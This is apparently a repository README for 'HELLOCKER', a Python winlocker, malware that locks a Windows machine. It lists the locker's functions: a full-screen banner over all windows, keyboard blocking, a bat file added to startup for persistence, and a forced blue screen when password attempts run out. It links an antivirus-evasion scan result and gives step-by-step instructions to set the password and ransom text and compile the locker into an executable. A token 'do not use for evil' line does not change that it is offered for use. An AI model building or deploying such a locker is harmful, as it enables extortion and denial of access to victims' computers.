Winlocker on python
HELLOCKER Winlocker written in Python. DO NOT USE FOR EVIL PURPOSES!
Functional:
1.Banner in full screen on top of all windows
-
Complete blocking of the keyboard (the password can be entered by clicking on the graphic buttons)
-
Creating a bat file to add to startup
-
Call bsod when password attempts expire
detections: https://antiscan.me/scan/new/result?id=waxnPp6SXDLi
Using:
1.Open the lock.py file in your code editor
-
Find the variables at the very beginning: password, lock_text and count.
-
In password, instead of "123" in quotes, enter the password from numbers.
-
In lock_text in quotes, enter the banner text
-
In count, enter the number of attempts to enter the password, without quotes.
-
Open a command line, go to the folder with the repository, write
pip install -r requriments.txt
then
pyinstaller -F lock.py
go to the new dist folder then find the lock.exe file there. This is your build.